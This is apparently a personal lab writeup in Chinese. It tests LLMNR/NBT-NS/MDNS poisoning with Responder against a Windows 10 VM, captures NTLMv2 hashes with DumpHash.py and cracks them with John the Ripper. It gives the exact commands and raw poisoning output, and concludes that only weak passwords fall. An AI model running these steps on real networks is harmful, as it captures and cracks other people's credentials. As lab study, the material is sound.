本地搭建环境:
宿主机Kali:192.168.43.209
虚拟机VirtualBox:
网络:桥接网络,使虚拟机和宿主机保持在一个网段
系统:win10家庭版系统(初始系统使用virtualbox安装过程默认密码changeme!
)
Responder
模拟:
win10使用初始密码
Kali启动Responder
python ./Responder.py -wd -I wlan0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
.
.
.
[+] Current Session Variables:
Responder Machine Name [WIN-R0J1ROPSQKF]
Responder Domain Name [TTQT.LOCAL]
Responder DCE-RPC Port [45338]
[+] Listening for events...
win10执行共享协议
cmd
net use \\x
Kali收到win10交互
然后ctrl + c
退出Responder,执行./DumpHash.py
保存hash值
可以看到本地保存了两个DumpNTLMv2.txt文件,开始破解(这一步基本可以很快破解)
john DumpNTLMv2.txt
修改win10帐号密码
这一步将密码改为复杂的密码(Wan0729!@#)继续重复以上的步骤基本上第2步就开始有问题
win10共享协议有问题
Responder读不到hash
[+] Current Session Variables:
Responder Machine Name [WIN-NHOH627GLXN]
Responder Domain Name [OXH5.LOCAL]
Responder DCE-RPC Port [49638]
[+] Listening for events...
[*] [DHCP] Found DHCP server IP: 192.168.43.110, now waiting for incoming requests...
[*] [MDNS] Poisoned answer sent to 192.168.43.238 for name x.local
[*] [MDNS] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x.local
[*] [MDNS] Poisoned answer sent to 192.168.43.238 for name x.local
[*] [LLMNR] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x
[*] [MDNS] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x.local
[*] [LLMNR] Poisoned answer sent to 192.168.43.238 for name x
[*] [LLMNR] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x
[*] [LLMNR] Poisoned answer sent to 192.168.43.238 for name x
[*] Skipping previously captured hash for .\vboxuser
卡在破解密码页面
重新修改密码为changeme1
后,可以破解,说明还是基于弱口令的一个破解,比较鸡肋,哈哈